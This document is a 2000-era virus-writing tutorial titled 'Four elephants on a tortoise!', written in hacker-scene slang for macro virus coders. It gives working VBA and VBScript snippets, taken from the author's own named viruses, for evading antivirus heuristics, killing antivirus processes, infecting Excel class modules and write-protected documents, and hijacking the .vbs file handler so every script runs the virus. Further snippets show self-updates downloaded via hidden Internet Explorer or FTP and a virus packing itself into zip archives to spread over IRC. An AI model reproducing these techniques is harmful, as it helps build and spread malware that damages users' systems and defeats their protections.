? ? ? ? ____ / \ ? Four elephants on a tortoise! ? / \ _ \ ? (An essay about advanced VBx) ( .o o. ) ___ .by jackie __/ ^ \/ \ / \___o____ \ .Introduction Hi there kids, this is your phunky ol' retired friend (!) back with another sloppy tutorial about four elephants on a tourtoise. In this essay I'm going to talk about some kewl topics concerning coding viruses in VBx. Check the short table of contents. .Antiheuristic for the mass .Language and user independent coding .Infection of write-protected files .VBScript infection - The jackie theory .Virus Update via WWW .Winzip archives and viruses As you see, more or less no one of all you macro coders out there plays a- round with these stuff, except a few guys (the old punks, hehehe, hi there guys!) sat down for a while and thought about technics like these. As a fact out of this, your creations get detect as Class.xx, Marker.xx, Across.xx, LoveLetter.xx, and so on, as you see, it seems like all your stuff is hacked shit for the AV community. Well, oh boy, the answer is easy, because most of you guys just use old technics, old sceme's, old shit, old hacks instead of sitting down, thinking, trying and researching. As output we can see masses of lame macros. That's why there are 36 variants of Marker, because you guys just change this and that in code, not because Spo0ky has written all of 'em that was you guys. X-D And one thing you should have in front of your eyes, what counts in VX community is the quality of coding and not the quantity. No one will care if you write 1000s of viruses which are all just hacks and strains. My friends, it's time to wake up and realize that virus coding is not a thing of destruction, it's a thing of art. Every single line of code represents it's coder. I know that there are too much lame wanna-be 'coders' around which behave like the sickest guys on earth with the 'Yo, man, I code virii man, get outta my way man!' attitude. These are the ones that try to show off in front of their computer - friends. These are the ones that rep- lace original signatures and names in original authors code and claim to be a virus writer. Hihihi. If you are such a guy, I feel very sorry for your poor stupid mind. It's time to change young coder. Otherwise you will never get it and you will never be accepted and understood. The best example for lameness and attitude problems combined with the topic of viruses, is the virus section of the messageboard on a german ' hackers ' site. Viruses are not made to destroy data of your ex-friend, etc get that kiddies. I could talk and discust about these guys hours and hours, but this is not topic of this paper. I'm sorry dear reader, but I do not want you to get like that lamer's around the cyberspace. X-D So, after that short column about general attitude, we can start with our first topic today, let see what we will have before going to bed... .Antiheuristic for the mass I see, ya're still here young coder. Okies, let see what we got for today. I am gonna tell you about the thing called 'Antiheuristics'. Well, some time ago, the AV community decided to use such a thing as 'Heuristic' to scan for viruses, which really helped 'em a lot to detect viruses, and they still use it. XD. Ok, as you might have realized, it's some kinda special technic to detect viruses and the thing we can do is called 'Antiheuristic', which are technics that can avoid heuristic detection of your virus. If you are the proud owner of a copy of Norton AntiVirus 5.X or higher, you might have not- iced that thing which is called ' Bloodhound '. Heh, this is NAV's heuristic engine. Pretty rad. XD. I think you have had your expiriences with it, but it's really easy to fake and I will show you how. First you must get in your head that the best medicine against heuristic is a ' strange ' coding style. I mean, try to code not in the normal way, your code might look strange, but, it's not detected. XD. For general information about easy anti - heuristic coding please refer to my other tutorial called 'A phreaky macro primer'. You should find some basics in chapter 15. Okies, well, an easy technic to fake bloodhound, is to use objects in a ph- reaky way. Just look at that. Set objPhreaky = Word.Application.Application.Application.ActiveDocument I used the object ' Application ' three times, result is that the heuristic won't get it as it is meant to be. varPhreaky = VBA.Chr(54) & VBA.Chr(54) & VBA.Chr(54) As you can see, I used the object 'VBA' infront, which has the same result for our purpose, but it fakes the heuristic. Word.Application.Options.VirusProtection = j Again, the object ' Word ' infront and something special behind, a variable without type and value. It werks! XD j = j + 1 Set objCheesy = Word.Application.VBProject.VBComponents(j).CodeModule I replaced the '1' for the component with a variable with the value '1'. It is just a basic trick. Set objCheesy = Word.Application.VBProject _ .VBComponents(CDec(CInt(Abs(1)))).CodeModule As you can see, it looks strange, but it werks fine. You might have noticed what I mean with 'strange' - coding style. XD. To fake a heuristic you just need to sit down for a while and think, try, research as I said before. Well this were some methods to code antiheuristic code and another one is to add encryption, remove obvious commands, etc. I hope you got what anti-heuristic means and what's it's purpose on virus coding. Btw, here are three lines of code that have not so much to do with anti - heuristic but with killing AV monitors. It's take from my W97M.Co0kie virus XD. Enjoy! For y = 1 To Tasks.Count If InStr(1, LCase(Tasks(y).Name), "vir") Then Tasks(y).Close Next This little piece of code does not more than kill all tasks that could be a virus scanner. XD. In the end of the chapter about anti - heuristic I wanted to tell you that you can use this technics in all areas, not only in Word. XD. I just did the Word compatible code as an example, because most of you have never touched any other application. .Language and user independent coding Dear young coder, you're still with me? Kewlie. Okies, let me get you into another chapter concerning 'language and user independent coding' this time. As you coded your creations, or not, you might have noticed that if you want ed to some stuff like a worm script for mIRC, or use Winzip, or any other application. The key to our needs is to use the registry to get all needed information about the application we want to abuse. For example I will show you now how to get the 'Program files' directory. p = Application.System.PrivateProfileString("", _ "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", _ "ProgramFilesDir") This example werks for Word97, but it's easy to get the path from any other Office application too. Just export the regkey with the shell command using 'regedit.exe' and read it into a string and use InStr(), Mid(), etc to get the needed string. Easy, isn't it? But I want YOU to code, so no examples for you. XD. Another example to get the windows directory, no matter if we are in Win9X or WinNT, is to use the Environ() function. Lemme show you how. w = VBA.Environ("windir") This is a little effective method to get the windows directory without of API use. Well, nearly all programs do have entrys in the windows registry where you can get informations like installation path, save directories, etc. Just try to research a bit. You can see that this is a kewl method to get dir's, etc because every infected user could have windows in another directory than you or anyone else, even the directory for the programs. So if you want to get language independent use this tricks. XD. Another thing I'm going to talk about in this paper is the infection of Excel class modules. Well, I'm pretty sure that 90% of you dear readers have never touched Excel or any other application than Word to write macros. Ok, there is something that was a stone in my way of infecting Excel class stuff since the first one was born. Lemme give you a brief intro to it. The Excel class module can't be accessed via stuff like using the ordinary command like '.VBComponents(1)', because the first component varies in every .xls file. So we were forced to use the name of the class module which is in english versions of Excel named 'ThisWorkbook'. Okies, so all viruses which used this technic would only work under the version which they where hard- coded for. ie 'DieseArbeitsmappe' for german version. As I had nothing better to do, I sat down for a while and thought about a solution to fix this language problem. Well, as God wanted, I found a little trick to solve the problem. The class module of every VBA project has a spe- cial number of properties on which I could identify it as Class module. Look at the piece of code below taken from my X97M.fireal, the first class virus that is able to spread under all version of Excel, no matter what language. For Each fireal In ThisWorkbook.VBProject.VBComponents If fireal.Properties.Count = 73 Then _ ourcode = fireal.codemodule.Lines(1, 22) Next First I walk through all the components and get the one I want and save the virus code for later use in a variable. That's the routine fireal uses to get its code. And I use the same style to find new classes to infect. For Each fireal In book.VBProject.VBComponents If fireal.Properties.Count = 73 [...] End If Next This technic is called 'Fireal-technic' and I'm sorry, I'm too stoned to re member why it has such a name!?. XD. I should take some vitamin pills. Okies I hope you got the clue and understood what I wanted to teach y'all young coders. .Infection of write-protected files In this chapter I will tell y'all something about the infection of write- protected files and how to infect them. You will see it's pretty easy to in- fect write protected files, but it has one point that we have to notice. The technic described here only works under Word97 SR-1 or higher and Word2000. Besides that there are two kinds of protection, the normal write-protection of windows and the VBA project protection. We can't yet infect documents which are protected by VBA, but protected files by windows. Okies, let's drop some code. If GetAttr(ActiveDocument.FullName) = 1 Then SetAttr ActiveDocument.FullName, 0 ActiveDocument.Reload End If [...] SetAttr ActiveDocument.FullName, 1 Use this code to infect write-protected documents and restore afterwards. I won't show you how to do it with NormalTemplate because if you're too stupid to find out for yourself you should drop this paper quick. Phuck, this chap- ter is short. Nargh, well I'm sorry, there's not more to say about this shit and I don't know any other technic to do it. XD. .VBScript infection - The jackie theory Yummie, yummie. I hope everything fits tight ... XD. While the world keeps spinning around, I am gonna tell the young coders out there something about a phreaky way to infect .vbs files. Since .vbs viruses use this same old te- chnic to search and infect files, I took some of my little time and invented some new technic to do it. It has to do something with hooking, because each .vbs file that gets executed gets infected too. Well, the theory is easy and the example code too. Let's see some code about the ' jackie theory of .vbs infection'. First of all you need the arguments. Set objArguments = WScript.Arguments You can check for arguments using this... objArguments.Count And access them via this command... objArguments(0) objArguments(1) [...etc...] As you see, you can easy use this commands to make your .vbs virus kinda resisdent. Just get the regkey of the .vbs shell, by using this: varCurrentShell = objShell.RegRead _ ("HKEY_CLASSES_ROOT\VBSFile\Shell\Open\Command\") Now you add yourself to this shell command, for example the new shell would be ' c:\windows\wscript.exe infinity.vbs %1 ' or kinda equal. Now every .vbs file gets executed via your infected .vbs file. So it's an easy trick to get the path and infect all the files in that path, inclusive the executed .vbs file. Ohhh , last but not least you have to execute the just infected .vbs file by our virus, otherwise it wound run. Just use this. Set objShell = CreateObject("WScript.Shell") objShell.Run "wscript.exe" & chr(32) & objcommandline(0) That's all for that topic today. I wrote VBS/Infinity, which uses this tech nic. Just toy a bit around with that code pieces. All is said and done. xD .Virus Update via WWW Back with another topic today, I am going to tell ya'll young coders about a new interesting technic in virus coding. The vision of a virus which is capable to update itself via the WWW. Well, Vecna did it first (Ya rule man) in Asm and I did it after that for all the macro people out there. xD. There are two technics which I researched, the first one is used my little example virus called W97M/One. It uses (Radio)ActiveX to update itself. Just take a close look at the code below. Set objNET = CreateObject("InternetExplorer.Application") Do While objNET.Busy VBA.DoEvents Loop objNET.Visible = 0 objNET.Navigate "http://www.your-url-here.org/your-file-here.txt" Do While objNET.ReadyState <> 4 VBA.DoEvents Loop sCode = objNET.Document.Body.innerText objNET.Quit Well, all we do is getting an ActiveX object, after that we make a loop un- til our beloved IE is loaded. Then we let IE load our source code file or whatever and make a loop again until IE loaded the file. We store the text which is our source code, into a variable and voila, we have some new piece of code in it, so it's your decision what you do with it now. xD. My W97M/One uses some ID and an internal version number to check for an up- date. This helps if there was no active connection, or the file wasn't found for any other reason. Just be creative, well, at least a bit. The second technic uses FTP.EXE to get file from the net. All you need is an ftp where you can upload your updates. xD. First open a file and print the following stuff in it. Open "c:\bla.ftp" For Output As #1 Print #1, "open ftp.server.org" Print #1, "Your-User-Name" Print #1, "Your-Top-Secret-Password" Print #1, "cd /your-dir-here/" Print #1, "hash" Print #1, "bin" Print #1, "prompt" Print #1, "lcd c:\" Print #1, "mget your-file.ext" Print #1, "bye" Close #1 Then launch FTP.EXE and download our stuff. xD Shell "c:\windows\ftp.exe -s:c:\bla.ftp", vbHide Now you should have your file on the users hdd and you can work with it but it's not part of that paper to tell you how. Check it out for yourself. xD As you see, it's not the big deal, and as Mister Sandman says, the most im- portant thing is to be creative. xD. Here you are! As I said, just toy a bit with that. .Winzip archives and viruses Fasten your seatbelt young coder, in this last chapter of 'Four elephants on a tortoise!' I'm gonna show you some of the lastest developements. I have to say that this one is my favourite. XD. I'm going to tell y'all about the kewl tool Winzip and it's viral capabilities. What would you think if your virus adds itself to every .zip archive it can find on the user's pc? Rad?! Aight! As you have to know, I have nothing better to do than writing shitty papers about elephants and tortoises, just that you can learn a bit out of them. Okies, the first step to use this kewl technic is that you have to check for the path where Winzip is installed on the local machine. As you read before you can use the registry to get the needed information. Would I be out of line if I give you an example? Naawww. XD. Okies, let's have here some code to learn. It's taken from my WM97/2000.Incubus. z = Application.System.PrivateProfileString("", _ "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _ "\CurrentVersion\App Paths\winzip32.exe", "") We got the path of Winzip into the variable 'z'. XD. Well, that you know, I am not going to show you how to search for .zip files. Use VBA commands or do some .vbs file as Incubus does. After you got some .zip files, you can use the following to add your virus to the file. VBA.Shell z & " -a -r " & "YourFile.ZIP" _ & Chr(32) & "Virus.EXT", vbHide I hope I needn't to say that your file must have pathinformation included. For example 'c:\pictures.zip' and 'c:\windows\hiddenvirus.doc' or something like that. If you are kinda involved into viral stuff, you might have noticed that you can write IRC-worms using the script language of mIRC,pIRCh, etc. Btw, IRC is the place where we meet. XD. Okies, enough. There were some worms and viruses that spread through IRC-channels so the developer of mIRC, etc build in some kinda protection against some filetypes. Actually all kewl filetypes like .exe, .com, .vbs, .doc, etc are ignored, so I came to the idea to let my macro zip itself to get save through the IRC-channels. XD. There are only two viruses which do it, it's first Co0kie and second Incubus, both by ehm.. my humble person. The concept is easy, the code too. Lemme drop you here an example taken from Co0kie. z = Application.System.PrivateProfileString("", _ "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _ "\CurrentVersion\App Paths\winzip32.exe", "") w = Environ("windir") VBA.Shell z & " -a -r " & w & "\co0kie.zip" _ & Chr(32) & w & "\how_to_make_tasty_co0kies.zip", vbHide Basically it's the same as the code above. As you see, it creates a .zip file into the windows directory. The best on this is that mIRC doesn't have .zip files on it's damn auto-ignore phuckshit. XD. There are some other parameters for Winzip which are more or less usefull for your viruses. Maybe you can need 'em. Use '-f' to renew the archive, '-m ' to move, '-u' to update, '-r' to include subdirs, '-p' to include path, '-ex' for maximum of compression, etc, etc... .Outroduction Finally, another strange paper you read and I wrote, reaches it's end. Last but not least, I have to mention a few kewl coders, which werk I really app- reaciate and which is phuckin'rad.XD. I'm talking about guys like, Knowdeth, LysKovick, Anti State Tortoise, VicodinES, Spo0ky, Foxz and some others who walked together with me through the dark woods of new inovative macro tech- nics. Thank you guys, you really did kewl werk! I dunno yet if there will be any new stuff coming from my side, because I feel kinda lazy these days. A lot of shit happenend and is happening and I'm kinda forced to leave things away. Only thing left to say which fits lately is 'mens sana in corpore sano', but I dunno if it fits for me. If I should burst into the flames, I just want you to know that I love you all. xD The last column of this paper is dedicated as an appeal to all the new guys that come outta ground from day to day. If you wanna learn, you're welcome, otherwise, get the phuck outta our world. So, in this sense, don't let the world bring you don't young coder and remember, whatever tomorrow brings, I could be there...XD. Sleep tight and listen to Black Sabbath! Mens sana in corpore sano, jackie Carinthia.Austria.Europe 15:38 24.06.00 .Greets'n'Thanks Phewie, this time I'm gonna shorten my list of shout out's a bit. Well, I hope I do not forget any of the kewl souls out there... .SlageHammer .Ya phuckin' rule bro, thanks for everything. I _ hope everything werks out again... .heXc .Thanks that y'are the only true one left. .Knowdeth .Yo bro, thanks for your mental care on me... .LysKovick .My favourite coder!!! .Anti State Tortoise .Ya're a rad coder. Sorry but I couldn't mail _ back, but I hope we can one day do our project. .Flitnic .Be like the young coders: don't let the world _ bring you down, see what is happening to me! XD .Spo0ky .Hope ya doin' fine. Give a lifesign man! .Virtual Life .Thanks for sharing ideas with you. .Equals9 .Man, where are you around? .Foxz .Hmmm...Foxz? Foxxxxxxxzzzzz? Fooooooxxxxxxxzz! .Evul .You roq the planet! .Mandragore .I want you for president! .Roadkil .My favourite op!!! .b0z0 .Thanks for all the kewl talks we have and of _ course your help! .Mr Sandman .It's nice to talk to ya! .Error .My greatest fan xD .Darkman .Phew, we haven't talked since ages...;( .Virus Buster .Supa dupa special thanks for that exception! .All I forgot .I luv y'all, ya beautiful, catch y'all around! .Linezer0 Network .Hi there tribe, CD, NtS, Hermes and all others! .Metaphase .Phuckin' great team. This paper is dedicated to most beautiful and kewlest girlie around heiXe today, tomorrow, forever .Contact If any of you feel like contacting me, you can use the following sources to contact me. No spam please. WorldWideWeb: http://www.coderz.net/jackie/ EMail: jackie@coderz.net IRC: Undernet #virus ICQ: 36135930 .Kewl Music .Black Sabbath .Best of .Soufly .Primitive .Deftones .Adrenaline [Linezer0 Oldskewl Tribe - Always lazy, always bored, always last]